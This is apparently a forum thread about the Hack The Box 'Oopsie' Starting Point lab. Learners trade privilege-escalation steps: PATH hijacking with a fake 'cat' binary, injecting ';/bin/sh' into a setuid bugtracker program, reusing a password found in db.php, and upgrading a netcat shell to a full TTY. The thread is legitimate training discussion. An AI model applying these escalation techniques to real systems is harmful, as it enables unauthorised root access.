Oopsie Machine - Starting Point

Hey everyone,
I am stuck at the end of the walk through to get the flag of this Machine... The tutorial at the end gives me these steps:

export PATH=.:$PATH
echo '/bin/sh' > cat
chmod +x ./cat

But every time i run the echo '/bin/sh' > cat , i get bash : cat : permission denied... No matter what i do i get the same error again and again...
Any little hint or help ? I would appreciate it..
Thanks...

«1

Comments

  • identical problem here.

  • There i also command injection, just execute bugtracker and type: ;/bin/sh then hit enter!

  • Type your comment> @DaChef said:

    There i also command injection, just execute bugtracker and type: ;/bin/sh then hit enter!

    Thanks @DaChef it was easier that it looked... :smile:
    Got user and Root Flags.. :smiley:

  • Type your comment> @m1l0 said:

    Type your comment> @DaChef said:

    There i also command injection, just execute bugtracker and type: ;/bin/sh then hit enter!

    Thanks @DaChef it was easier that it looked... :smile:
    Got user and Root Flags.. :smiley:

    Gj :)

  • edited March 29

    where to do command injection excatly? still struggling with this.

  • Type your comment> @BAACS said:

    where to do command injection excatly? still struggling with this.

    just goot root! 30 seconds after posting this :smiley: hahahha.

  • edited March 29

    ...

  • I'm struggling to fully understand the shell upgrade code i.e.

    SHELL=/bin/bash script -q /dev/null
    Ctrl-Z
    stty raw -echo
    fg
    reset
    xterm

    I get that SHELL sets the users shell, but it seems to be running "script" and sending the output to null. From googling it seems that script is a kind of command recorder - unclear how his helps! Then I assume the Ctrl-Z is meant to background something (breaks the nc connection for me). stty switches off echoing, ok not sure how this helps.

    reset and xterm resets the terminal session.

    So I kinda get the individual commands, but can anyone explain how this works as a whole?
    Thanks

  • is anyone else having an issue even getting a result from scans in startpoint....

  • Type your comment> @DaChef said:

    There i also command injection, just execute bugtracker and type: ;/bin/sh then hit enter!

    I appreciate your answer bro, may i know wht made this code "export PATH=.:$PATH
    echo '/bin/sh' > cat
    chmod +x ./cat,"not work in the first place

    Ja4V8s28Ck
    Nothing is an Accident, It's Just a part of Destiny

  • Type your comment> @Ja4V8s28Ck said:

    Type your comment> @DaChef said:

    There i also command injection, just execute bugtracker and type: ;/bin/sh then hit enter!

    I appreciate your answer bro, may i know wht made this code "export PATH=.:$PATH
    echo '/bin/sh' > cat
    chmod +x ./cat,"not work in the first place

    The correct approach on PATH env variable poisoning would be:
    cd /tmp/
    echo "/bin/sh" > cat
    chmod +x cat
    export PATH=/tmp:$PATH

    The dot referencing on your current directory is wrong, you need to specify the exact path!

  • edited April 5

    The correct approach on PATH env variable poisoning would be:
    cd /tmp/
    echo "/bin/sh" > cat
    chmod +x cat
    export PATH=/tmp:$PATH

    @DaChef /tmp or any directory in which your current user has privileges to write.

  • edited April 6

    post removed - posted in wrong thread

  • Type your comment> @phamilton said:

    The correct approach on PATH env variable poisoning would be:
    cd /tmp/
    echo "/bin/sh" > cat
    chmod +x cat
    export PATH=/tmp:$PATH

    @DaChef /tmp or any directory in which your current user has privileges to write.

    This worked from me. Thanks smiley:

  • Did any of you manage to get the user flag from this machine? If so where did you manage to find the sucker?

  • edited April 16

    Right now bugtracker doesn't have the setuid bit set, so the cat shell just gives you normal permission. Something to check if you are running everything else right and it just doesn't work.

    [email protected]:/tmp$ /usr/bin/bugtracker

    : EV Bug Tracker :

    Provide Bug ID: 1

    $ whoami
    robert
    $ ls -al /usr/bin/bugtracker
    -rwxr-xr-x 1 root root 8792 Apr 16 02:56 /usr/bin/bugtracker

    However bugtracker.save still has the setuid bit so that can work:
    $ ls -al /usr/bin/bugtracker.save
    -rwsr-xr-x 1 root bugtracker 8792 Jan 25 10:14 /usr/bin/bugtracker.save

    $ /usr/bin/bugtracker.save

    : EV Bug Tracker :

    Provide Bug ID: 1

    whoami

    root

  • edited April 20

    I am able to do that but when do cat /root/root.txt nothing happens

    Never mind found it

  • edited April 23

    @NeoCortex2000 said:
    Did any of you manage to get the user flag from this machine? If so where did you manage to find the sucker?

    I had the same problem and was fooled by the fact that r̶u̶n̶n̶i̶n̶g̶ misusing locate wasn't turning anything up. You'll find what you need if you keep looking.

    stevebytheway

  • Type your comment> @stevebytheway said:

    @NeoCortex2000 said:
    Did any of you manage to get the user flag from this machine? If so where did you manage to find the sucker?

    I had the same problem and was fooled by the fact that running locate wasn't turning anything up. You'll find what you need if you keep looking.

    Hey Steve yes I found it with the linux find command in the end: find / -name *.txt

  • I am in netcat and logged in as www-data
    [email protected]:
    When I try to sudo robert im getting sorry try again?
    I am using the password from the db.php file.
    A I missing something?

  • @ritorix How did you get into the robert user account? when I attempt su robert and enter the password from the db.php file, it gives me "su: Authentication failure"

  • Looks like someone may have changed the password? I tried the same process today and it worked!

  • Type your comment> @kp22cfc said:

    I am able to do that but when do cat /root/root.txt nothing happens

    Never mind found it

    how did you manage?? I can't seem to be able to cat?!

  • @Jade86 said:
    Type your comment> @kp22cfc said:

    I am able to do that but when do cat /root/root.txt nothing happens

    Never mind found it

    how did you manage?? I can't seem to be able to cat?!

    ah ok. got it, sorry lol

  • OK. Noob here. I got all the way to the end and it looks like I did everything right. I run /usr/bin/bugtracker and get the correct output but I still don't have access to anything. i.e. /root. I've gone through the walkthrough many times for over 16 hours and I get the same result. Any advice?

  • Hi guys, need help.. script below is not working for me.

    SHELL=/bin/bash script -q /dev/null
    Ctrl-Z
    stty raw -echo
    fg
    reset
    xterm

    this is what happening
    [email protected]:/$ SHELL=/bin/bash script -q /dev/null
    Ctrl-Z
    stty raw -echo
    fg
    reset
    xtermSHELL=/bin/bash script -q /dev/null
    [email protected]:/$ Ctrl-Z
    Ctrl-Z: command not found
    [email protected]:/$ stty raw -echo
    [email protected]:/$ bash: fg: current: no such job
    [email protected]:/$ reset: unknown terminal type unknown
    Terminal type?

    help me understand what is happening here?

  • someone help me understand that Ctrl-Z is to send the nc connection in the background without killing it (this is where i was getting confused). then "fg" command brings it forward ..

    Hope this helps to users like me.. :smile:

    Type your comment> @deeptestpilot said:

    Hi guys, need help.. script below is not working for me.

    SHELL=/bin/bash script -q /dev/null
    Ctrl-Z
    stty raw -echo
    fg
    reset
    xterm

    this is what happening
    [email protected]:/$ SHELL=/bin/bash script -q /dev/null
    Ctrl-Z
    stty raw -echo
    fg
    reset
    xtermSHELL=/bin/bash script -q /dev/null
    [email protected]:/$ Ctrl-Z
    Ctrl-Z: command not found
    [email protected]:/$ stty raw -echo
    [email protected]:/$ bash: fg: current: no such job
    [email protected]:/$ reset: unknown terminal type unknown
    Terminal type?

    help me understand what is happening here?

  • Did you find how to solve Terminal type? I'm stuck at that point
    Type your comment> @deeptestpilot said:

    someone help me understand that Ctrl-Z is to send the nc connection in the background without killing it (this is where i was getting confused). then "fg" command brings it forward ..

    Hope this helps to users like me.. :smile:

    Type your comment> @deeptestpilot said:

    Hi guys, need help.. script below is not working for me.

    SHELL=/bin/bash script -q /dev/null
    Ctrl-Z
    stty raw -echo
    fg
    reset
    xterm

    this is what happening
    [email protected]:/$ SHELL=/bin/bash script -q /dev/null
    Ctrl-Z
    stty raw -echo
    fg
    reset
    xtermSHELL=/bin/bash script -q /dev/null
    [email protected]:/$ Ctrl-Z
    Ctrl-Z: command not found
    [email protected]:/$ stty raw -echo
    [email protected]:/$ bash: fg: current: no such job
    [email protected]:/$ reset: unknown terminal type unknown
    Terminal type?

    help me understand what is happening here?

  • Type your comment> @deeptestpilot said:

    Hi guys, need help.. script below is not working for me.

    this is what happening
    [email protected]:/$ SHELL=/bin/bash script -q /dev/null
    Ctrl-Z

    Don't copy and paste the block of code provided. After the SHELL command don't type "Ctrl-Z". Press the Ctrl and Z keypad buttons at the same time. This will throw you back to your attacker machine and put the shell in the background. So you should have your vm's command line.

    Then type the stty command. Enter.
    Then type "fg" which will bring your shell cli back up. In the shell cli type "reset" and you will be asked what type of terminal to open. Type "xterm". viola! I ran into this also

Sign In to comment.